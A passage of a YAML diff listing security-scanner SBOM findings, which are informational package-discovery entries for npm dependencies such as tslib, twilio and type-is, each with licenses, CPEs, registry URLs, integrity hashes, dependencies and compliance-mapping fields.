^4.0.3 + jiti: ^1.21.7 + lilconfig: ^3.1.3 + micromatch: ^4.0.8 + normalize-path: ^3.0.0 + object-hash: ^3.0.0 + picocolors: ^1.1.1 + postcss: ^8.4.47 + postcss-import: ^15.1.0 + postcss-js: ^4.0.1 + postcss-load-config: ^4.0.2 || ^5.0 || ^6.0 + postcss-nested: ^6.2.0 + postcss-selector-parser: ^6.1.2 + resolve: ^1.22.8 + sucrase: ^3.35.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1167979aa3e3af06 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: teeny-request 9.0.0' + title: teeny-request 9.0.0 + description: 'Package discovered: teeny-request 9.0.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 5100f72eed8a2178 + name: teeny-request + version: 9.0.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:teeny-request:teeny-request:9.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:teeny-request:teeny_request:9.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:teeny_request:teeny-request:9.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:teeny_request:teeny_request:9.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:teeny:teeny-request:9.0.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:teeny:teeny_request:9.0.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/teeny-request@9.0.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/teeny-request/-/teeny-request-9.0.0.tgz + integrity: sha512-resvxdc6Mgb7YEThw6G6bExlXKkv6+YbuzGg9xuXxSgxJF7Ozs+o8Y9+2R3sArdWdW8nOokoQb1yrpFB0pQK2g== + dependencies: + http-proxy-agent: ^5.0.0 + https-proxy-agent: ^5.0.0 + node-fetch: ^2.6.9 + stream-events: ^1.0.5 + uuid: ^9.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: b4e9549620686503 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: thenify 3.3.1' + title: thenify 3.3.1 + description: 'Package discovered: thenify 3.3.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 9fd87e687c3b74ca + name: thenify + version: 3.3.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:thenify:thenify:3.3.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/thenify@3.3.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/thenify/-/thenify-3.3.1.tgz + integrity: sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw== + dependencies: + any-promise: ^1.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: a439c679c65c98cd + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: thenify-all 1.6.0' + title: thenify-all 1.6.0 + description: 'Package discovered: thenify-all 1.6.0' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 845b1699e3aa7533 + name: thenify-all + version: 1.6.0 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:thenify-all:thenify-all:1.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thenify-all:thenify_all:1.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thenify_all:thenify-all:1.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thenify_all:thenify_all:1.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thenify:thenify-all:1.6.0:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thenify:thenify_all:1.6.0:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/thenify-all@1.6.0 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/thenify-all/-/thenify-all-1.6.0.tgz + integrity: sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA== + dependencies: + thenify: '>= 3.1.0 < 4' + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e5c0090ac7c6baa4 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: thirty-two 1.0.2' + title: thirty-two 1.0.2 + description: 'Package discovered: thirty-two 1.0.2' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: f3444a348db654fb + name: thirty-two + version: 1.0.2 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: [] + language: javascript + cpes: + - cpe: cpe:2.3:a:thirty-two:thirty-two:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thirty-two:thirty_two:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thirty_two:thirty-two:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thirty_two:thirty_two:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thirty:thirty-two:1.0.2:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:thirty:thirty_two:1.0.2:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/thirty-two@1.0.2 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/thirty-two/-/thirty-two-1.0.2.tgz + integrity: sha512-OEI0IWCe+Dw46019YLl6V10Us5bi574EvlJEOcAkB29IzQ/mYD1A6RyNHLjZPiHCmuodxvgF6U+vZO1L15lxVA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ed31df7df590fd3e + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: tiny-inflate 1.0.3' + title: tiny-inflate 1.0.3 + description: 'Package discovered: tiny-inflate 1.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 8a9f89a30def4776 + name: tiny-inflate + version: 1.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:tiny-inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny-inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny_inflate:tiny-inflate:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny_inflate:tiny_inflate:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny:tiny-inflate:1.0.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny:tiny_inflate:1.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/tiny-inflate@1.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/tiny-inflate/-/tiny-inflate-1.0.3.tgz + integrity: sha512-pkY1fj1cKHb2seWDy0B16HeWyczlJA9/WW3u3c4z/NiWDsO3DOU5D7nhTLE9CF0yXv/QZFY7sEJmj24dK+Rrqw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 99c39b0d16665208 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: tiny-invariant 1.3.3' + title: tiny-invariant 1.3.3 + description: 'Package discovered: tiny-invariant 1.3.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 509a74e9f8ec9c11 + name: tiny-invariant + version: 1.3.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:tiny-invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny-invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny_invariant:tiny-invariant:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny_invariant:tiny_invariant:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny:tiny-invariant:1.3.3:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:tiny:tiny_invariant:1.3.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/tiny-invariant@1.3.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/tiny-invariant/-/tiny-invariant-1.3.3.tgz + integrity: sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: e99ae3502724aa2b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: tinyglobby 0.2.16' + title: tinyglobby 0.2.16 + description: 'Package discovered: tinyglobby 0.2.16' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ea1b10e091012c4d + name: tinyglobby + version: 0.2.16 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:tinyglobby:tinyglobby:0.2.16:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/tinyglobby@0.2.16 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz + integrity: sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg== + dependencies: + fdir: ^6.5.0 + picomatch: ^4.0.4 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 098e9c86e46e996b + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: to-regex-range 5.0.1' + title: to-regex-range 5.0.1 + description: 'Package discovered: to-regex-range 5.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 32aacf96124c437a + name: to-regex-range + version: 5.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:to-regex-range:to-regex-range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to-regex-range:to_regex_range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to_regex_range:to-regex-range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to_regex_range:to_regex_range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to-regex:to-regex-range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to-regex:to_regex_range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to_regex:to-regex-range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to_regex:to_regex_range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to:to-regex-range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:to:to_regex_range:5.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/to-regex-range@5.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz + integrity: sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ== + dependencies: + is-number: ^7.0.0 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: eba377c5cfb24e56 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: toidentifier 1.0.1' + title: toidentifier 1.0.1 + description: 'Package discovered: toidentifier 1.0.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: ce376bb248c7ffa1 + name: toidentifier + version: 1.0.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:toidentifier:toidentifier:1.0.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/toidentifier@1.0.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz + integrity: sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 332c86a1be157c00 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: tr46 0.0.3' + title: tr46 0.0.3 + description: 'Package discovered: tr46 0.0.3' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 44b5fbfc3cffc498 + name: tr46 + version: 0.0.3 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:tr46:tr46:0.0.3:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/tr46@0.0.3 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/tr46/-/tr46-0.0.3.tgz + integrity: sha512-N3WMsuqV66lT30CrXNbEjx4GEwlow3v6rr4mCcv6prnfwhS01rkgyFdjPNBYd9br7LpXV1+Emh01fHnq2Gdgrw== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 975e90d4d26bc8ab + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: ts-interface-checker 0.1.13' + title: ts-interface-checker 0.1.13 + description: 'Package discovered: ts-interface-checker 0.1.13' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 4b85ef460bf1550e + name: ts-interface-checker + version: 0.1.13 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: Apache-2.0 + spdxExpression: Apache-2.0 + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:ts-interface-checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts-interface-checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts_interface_checker:ts-interface-checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts_interface_checker:ts_interface_checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts-interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts-interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts_interface:ts-interface-checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts_interface:ts_interface_checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts:ts-interface-checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:ts:ts_interface_checker:0.1.13:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/ts-interface-checker@0.1.13 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/ts-interface-checker/-/ts-interface-checker-0.1.13.tgz + integrity: sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: ef69db02aad9ddba + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: tslib 2.4.1' + title: tslib 2.4.1 + description: 'Package discovered: tslib 2.4.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a41a6d4fcfaa1c57 + name: tslib + version: 2.4.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: 0BSD + spdxExpression: 0BSD + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:tslib:tslib:2.4.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/tslib@2.4.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz + integrity: sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 15d8d07e284b7f66 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: tslib 2.8.1' + title: tslib 2.8.1 + description: 'Package discovered: tslib 2.8.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: 732c6f5be784c8f2 + name: tslib + version: 2.8.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: 0BSD + spdxExpression: 0BSD + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:tslib:tslib:2.8.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/tslib@2.8.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/tslib/-/tslib-2.8.1.tgz + integrity: sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w== + dependencies: null + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: d407f6f6881f51f1 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: twilio 5.13.1' + title: twilio 5.13.1 + description: 'Package discovered: twilio 5.13.1' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: b26b672319df2e47 + name: twilio + version: 5.13.1 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:twilio:twilio:5.13.1:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/twilio@5.13.1 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/twilio/-/twilio-5.13.1.tgz + integrity: sha512-sT+PkhptF4Mf7t8eXFFvPQx4w5VHnBIPXbltGPMFRe+R2GxfRdMuFbuNA/cEm0aQR6LFQOn33+fhClg+TjRVqQ== + dependencies: + axios: ^1.13.5 + dayjs: ^1.11.9 + https-proxy-agent: ^5.0.0 + jsonwebtoken: ^9.0.3 + qs: ^6.14.1 + scmp: ^2.1.0 + xmlbuilder: ^13.0.2 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 + priority: + priority: 3.333333333333333 + epss: null + epss_percentile: null + is_kev: false + kev_due_date: null + components: + severity_score: 1 + epss_multiplier: 1.0 + kev_multiplier: 1.0 + reachability_multiplier: 1.0 +- schemaVersion: 1.2.0 + id: 1b446cdccc9a93b0 + ruleId: SBOM.PACKAGE + severity: INFO + tool: + name: syft + version: unknown + location: + path: /package-lock.json + startLine: 0 + message: 'Package discovered: type-is 1.6.18' + title: type-is 1.6.18 + description: 'Package discovered: type-is 1.6.18' + remediation: Track and scan dependencies. + references: [] + tags: + - sbom + - package + raw: + id: a8ca97010550105a + name: type-is + version: 1.6.18 + type: npm + foundBy: javascript-lock-cataloger + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + licenses: + - value: MIT + spdxExpression: MIT + type: declared + urls: [] + locations: + - path: /package-lock.json + accessPath: /package-lock.json + annotations: + evidence: primary + language: javascript + cpes: + - cpe: cpe:2.3:a:type-is:type-is:1.6.18:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:type-is:type_is:1.6.18:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:type_is:type-is:1.6.18:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:type_is:type_is:1.6.18:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:type:type-is:1.6.18:*:*:*:*:*:*:* + source: syft-generated + - cpe: cpe:2.3:a:type:type_is:1.6.18:*:*:*:*:*:*:* + source: syft-generated + purl: pkg:npm/type-is@1.6.18 + metadataType: javascript-npm-package-lock-entry + metadata: + resolved: https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz + integrity: sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g== + dependencies: + media-typer: 0.3.0 + mime-types: ~2.1.24 + compliance: + cisControlsV8_1: *id010 + nistCsf2_0: + - *id011 + - *id012 + pciDss4_0: + - *id013 + - *id014 + mitreAttack: + - *id015 